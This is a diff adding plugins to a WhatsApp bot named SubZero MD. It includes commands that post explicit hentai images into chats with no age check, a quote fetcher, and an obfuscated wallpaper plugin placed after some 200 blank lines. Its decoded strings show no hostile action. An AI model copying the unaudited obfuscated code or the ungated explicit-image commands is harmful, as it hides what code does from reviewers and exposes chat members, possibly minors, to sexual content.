const apiUrl = 'https://pikabotzapi.vercel.app/anime-nsfw/hentai-images/?apikey=anya-md&category=orgasm';
|
283 |
+
|
284 |
+
// Faire une requête à l'API
|
285 |
+
const response = await fetch(apiUrl);
|
286 |
+
const data = await response.json();
|
287 |
+
|
288 |
+
// Vérification des données reçues
|
289 |
+
if (data && data.image) {
|
290 |
+
const imageUrl = data.image; // URL de l'image reçue depuis l'API
|
291 |
+
|
292 |
+
// Envoi de l'image dans le chat
|
293 |
+
await conn.sendMessage(from, {
|
294 |
+
image: { url: imageUrl },
|
295 |
+
caption: 'Here is your orgasm NSFW image 🔞💥.\n> © Gᴇɴᴇʀᴀᴛᴇᴅ ʙʏ Nᴀsᴛʏ SᴜʙZᴇʀᴏ😋💥🔞.'
|
296 |
+
}, { quoted: mek });
|
297 |
+
} else {
|
298 |
+
reply('❌ Unable to fetch image. Please try again later.');
|
299 |
+
}
|
300 |
+
} catch (e) {
|
301 |
+
console.error(e);
|
302 |
+
await reply('❌ An error occurred while processing your request.');
|
303 |
+
}
|
304 |
+
});
|
305 |
+
cmd({
|
306 |
+
pattern: "anal", // Nom de la commande
|
307 |
+
desc: "Display a NSFW anal image",
|
308 |
+
category: "fun",
|
309 |
+
use: '.anal',
|
310 |
+
react: "🔥", // Réaction ajoutée
|
311 |
+
filename: __filename
|
312 |
+
},
|
313 |
+
async (conn, mek, m, { from, l, quoted, body, isCmd, command, args, q, isGroup, sender, senderNumber, botNumber2, botNumber, pushname, isMe, isOwner, groupMetadata, groupName, participants, groupAdmins, isBotAdmins, isAdmins, reply }) => {
|
314 |
+
try {
|
315 |
+
// URL de l'API pour obtenir l'image de la catégorie "anal_sex"
|
316 |
+
const apiUrl = 'https://pikabotzapi.vercel.app/anime-nsfw/hentai-images/?apikey=anya-md&category=anal_sex';
|
317 |
+
|
318 |
+
// Faire une requête à l'API
|
319 |
+
const response = await fetch(apiUrl);
|
320 |
+
const data = await response.json();
|
321 |
+
|
322 |
+
// Vérification des données reçues
|
323 |
+
if (data && data.image) {
|
324 |
+
const imageUrl = data.image; // URL de l'image reçue depuis l'API
|
325 |
+
|
326 |
+
// Envoi de l'image dans le chat
|
327 |
+
await conn.sendMessage(from, {
|
328 |
+
image: { url: imageUrl },
|
329 |
+
caption: 'Here is your anal NSFW image 🔞🔥.\n> © Gᴇɴᴇʀᴀᴛᴇᴅ ʙʏ Nᴀsᴛʏ SᴜʙZᴇʀᴏ😋🔥🔞.'
|
330 |
+
}, { quoted: mek });
|
331 |
+
} else {
|
332 |
+
reply('❌ Unable to fetch image. Please try again later.');
|
333 |
+
}
|
334 |
+
} catch (e) {
|
335 |
+
console.error(e);
|
336 |
+
await reply('❌ An error occurred while processing your request.');
|
337 |
+
}
|
338 |
+
});
|
339 |
+
cmd({
|
340 |
+
pattern: "suspension", // Nom de la commande
|
341 |
+
desc: "Display a NSFW suspension image",
|
342 |
+
category: "fun",
|
343 |
+
use: '.suspension',
|
344 |
+
react: "🔥", // Réaction ajoutée
|
345 |
+
filename: __filename
|
346 |
+
},
|
347 |
+
async (conn, mek, m, { from, l, quoted, body, isCmd, command, args, q, isGroup, sender, senderNumber, botNumber2, botNumber, pushname, isMe, isOwner, groupMetadata, groupName, participants, groupAdmins, isBotAdmins, isAdmins, reply }) => {
|
348 |
+
try {
|
349 |
+
// URL de l'API pour obtenir l'image de la catégorie "suspension"
|
350 |
+
const apiUrl = 'https://pikabotzapi.vercel.app/anime-nsfw/hentai-images/?apikey=anya-md&category=suspension';
|
351 |
+
|
352 |
+
// Faire une requête à l'API
|
353 |
+
const response = await fetch(apiUrl);
|
354 |
+
const data = await response.json();
|
355 |
+
|
356 |
+
// Vérification des données reçues
|
357 |
+
if (data && data.image) {
|
358 |
+
const imageUrl = data.image; // URL de l'image reçue depuis l'API
|
359 |
+
|
360 |
+
// Envoi de l'image dans le chat
|
361 |
+
await conn.sendMessage(from, {
|
362 |
+
image: { url: imageUrl },
|
363 |
+
caption: 'Here is your suspension NSFW image 🔞🔥.\n> © Gᴇɴᴇʀᴀᴛᴇᴅ ʙʏ Nᴀsᴛʏ SᴜʙZᴇʀᴏ😋🔥🔞.'
|
364 |
+
}, { quoted: mek });
|
365 |
+
} else {
|
366 |
+
reply('❌ Unable to fetch image. Please try again later.');
|
367 |
+
}
|
368 |
+
} catch (e) {
|
369 |
+
console.error(e);
|
370 |
+
await reply('❌ An error occurred while processing your request.');
|
371 |
+
}
|
372 |
+
});
|
373 |
+
cmd({
|
374 |
+
pattern: "kiss", // Nom de la commande
|
375 |
+
desc: "Display a NSFW kissing image",
|
376 |
+
category: "fun",
|
377 |
+
use: '.kiss',
|
378 |
+
react: "💋", // Réaction ajoutée
|
379 |
+
filename: __filename
|
380 |
+
},
|
381 |
+
async (conn, mek, m, { from, l, quoted, body, isCmd, command, args, q, isGroup, sender, senderNumber, botNumber2, botNumber, pushname, isMe, isOwner, groupMetadata, groupName, participants, groupAdmins, isBotAdmins, isAdmins, reply }) => {
|
382 |
+
try {
|
383 |
+
// URL de l'API pour obtenir l'image de la catégorie "kissing_while_penetrated"
|
384 |
+
const apiUrl = 'https://pikabotzapi.vercel.app/anime-nsfw/hentai-images/?apikey=anya-md&category=kissing_while_penetrated';
|
385 |
+
|
386 |
+
// Faire une requête à l'API
|
387 |
+
const response = await fetch(apiUrl);
|
388 |
+
const data = await response.json();
|
389 |
+
|
390 |
+
// Vérification des données reçues
|
391 |
+
if (data && data.image) {
|
392 |
+
const imageUrl = data.image; // URL de l'image reçue depuis l'API
|
393 |
+
|
394 |
+
// Envoi de l'image dans le chat
|
395 |
+
await conn.sendMessage(from, {
|
396 |
+
image: { url: imageUrl },
|
397 |
+
caption: 'Here is your kiss NSFW image 🔞💋.\n> © Gᴇɴᴇʀᴀᴛᴇᴅ ʙʏ Nᴀsᴛʏ SᴜʙZᴇʀᴏ😋💋🔞.'
|
398 |
+
}, { quoted: mek });
|
399 |
+
} else {
|
400 |
+
reply('❌ Unable to fetch image. Please try again later.');
|
401 |
+
}
|
402 |
+
} catch (e) {
|
403 |
+
console.error(e);
|
404 |
+
await reply('❌ An error occurred while processing your request.')
|
405 |
+
}
|
406 |
+
});
|
plugins/fun-quote.js
ADDED
@@ -0,0 +1,245 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
|
218 |
+
|
219 |
+
|
220 |
+
|
221 |
+
const axios = require('axios');
|
222 |
+
const { cmd } = require('../command');
|
223 |
+
|
224 |
+
cmd({
|
225 |
+
pattern: "quote",
|
226 |
+
desc: "Get a random inspiring quote.",
|
227 |
+
category: "fun",
|
228 |
+
react: "💬",
|
229 |
+
filename: __filename
|
230 |
+
},
|
231 |
+
async (conn, mek, m, { from, reply }) => {
|
232 |
+
try {
|
233 |
+
const response = await axios.get('https://api.gifted.my.id/api/fun/quotes?apikey=gifted');
|
234 |
+
const quote = response.data;
|
235 |
+
const message = `
|
236 |
+
💬 "${quote.content}"
|
237 |
+
- ${quote.author}
|
238 |
+
*QUOTES BY MR FRANK OFC*
|
239 |
+
`;
|
240 |
+
return reply(message);
|
241 |
+
} catch (e) {
|
242 |
+
console.error("Error fetching quote:", e);
|
243 |
+
reply("¢συℓ∂ ησт ƒєт¢н α qυσтє. ρℓєαѕє тяу αgαιη ℓαтєя.");
|
244 |
+
}
|
245 |
+
});
|
plugins/fun-randomwallpaper.js
ADDED
@@ -0,0 +1,221 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
|
218 |
+
|
219 |
+
|
220 |
+
|
221 |
+
const _0x350200=_0x4b7c;function _0x4b7c(_0x8b8413,_0x320a29){const _0x45f84b=_0x45f8();return _0x4b7c=function(_0x4b7c23,_0x47fa32){_0x4b7c23=_0x4b7c23-0xde;let _0x391e8c=_0x45f84b[_0x4b7c23];return _0x391e8c;},_0x4b7c(_0x8b8413,_0x320a29);}(function(_0x31bae5,_0x183132){const _0x36e66e=_0x4b7c,_0x2b4fde=_0x31bae5();while(!![]){try{const _0x8031f9=parseInt(_0x36e66e(0xe6))/0x1+parseInt(_0x36e66e(0xe5))/0x2*(parseInt(_0x36e66e(0xeb))/0x3)+parseInt(_0x36e66e(0xf5))/0x4+-parseInt(_0x36e66e(0xfa))/0x5+-parseInt(_0x36e66e(0xf7))/0x6*(parseInt(_0x36e66e(0xee))/0x7)+-parseInt(_0x36e66e(0xf4))/0x8*(-parseInt(_0x36e66e(0xe1))/0x9)+parseInt(_0x36e66e(0xdf))/0xa*(-parseInt(_0x36e66e(0xf9))/0xb);if(_0x8031f9===_0x183132)break;else _0x2b4fde['push'](_0x2b4fde['shift']());}catch(_0x3565c5){_0x2b4fde['push'](_0x2b4fde['shift']());}}}(_0x45f8,0x61860));function hi(){const _0x493f2f=_0x4b7c;console[_0x493f2f(0xea)](_0x493f2f(0xfb));}hi();const {cmd,commands}=require('../command'),{getBuffer,getGroupAdmins,getRandom,h2k,isUrl,Json,runtime,sleep,fetchJson}=require('../lib/functions'),axios=require(_0x350200(0xe2));function _0x45f8(){const _0x55715d=['data','*\x0a\x0a>\x20*©\x20Generated\x20by\x20SubZero*','348HUQddj','249993nfQrEs','wallpapers','join','.rw\x20<keyword>','log','729JJlUQy','https://pikabotzapi.vercel.app/random/randomwall/?apikey=anya-md&query=','❌\x20An\x20error\x20occurred\x20while\x20fetching\x20the\x20wallpaper.','572978XIjOho','randomwall','sendMessage','status','❌\x20Failed\x20to\x20fetch\x20wallpaper\x20for\x20\x22','error','8hfpjjj','2166776TrjHxG','Download\x20random\x20wallpapers\x20based\x20on\x20keywords.','24oChlss','wallpaper','264RaVwUa','3635530mgvmII','Hello\x20World!','imgUrl','get','44680MOyCUn','🌌\x20Random\x20Wallpaper:\x20*','6545169nFwhVi','axios'];_0x45f8=function(){return _0x55715d;};return _0x45f8();}cmd({'pattern':'rw','alias':[_0x350200(0xef),_0x350200(0xf8)],'react':'🌌','desc':_0x350200(0xf6),'category':_0x350200(0xe7),'use':_0x350200(0xe9),'filename':__filename},async(_0x5b0f11,_0x55e925,_0x37885a,{from:_0x3a799f,args:_0x149ac2,reply:_0xc5f584})=>{const _0x214c9c=_0x350200;try{const _0x99e043=_0x149ac2[_0x214c9c(0xe8)]('\x20')||'random',_0x271cf4=_0x214c9c(0xec)+_0x99e043,_0x571872=await axios[_0x214c9c(0xde)](_0x271cf4);if(_0x571872[_0x214c9c(0xe3)][_0x214c9c(0xf1)]){const _0x1558ab=_0x571872[_0x214c9c(0xe3)][_0x214c9c(0xfc)],_0x4fe51c=_0x214c9c(0xe0)+_0x99e043+_0x214c9c(0xe4);await _0x5b0f11[_0x214c9c(0xf0)](_0x3a799f,{'image':{'url':_0x1558ab},'caption':_0x4fe51c},{'quoted':_0x55e925});}else _0xc5f584(_0x214c9c(0xf2)+_0x99e043+'\x22.');}catch(_0x29cbc7){console[_0x214c9c(0xf3)](_0x29cbc7),_0xc5f584(_0x214c9c(0xed));}});
|
plugins/fun-tools.js
ADDED
@@ -0,0 +1,220 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
|
218 |
+
|
219 |
+
|
220 |
+
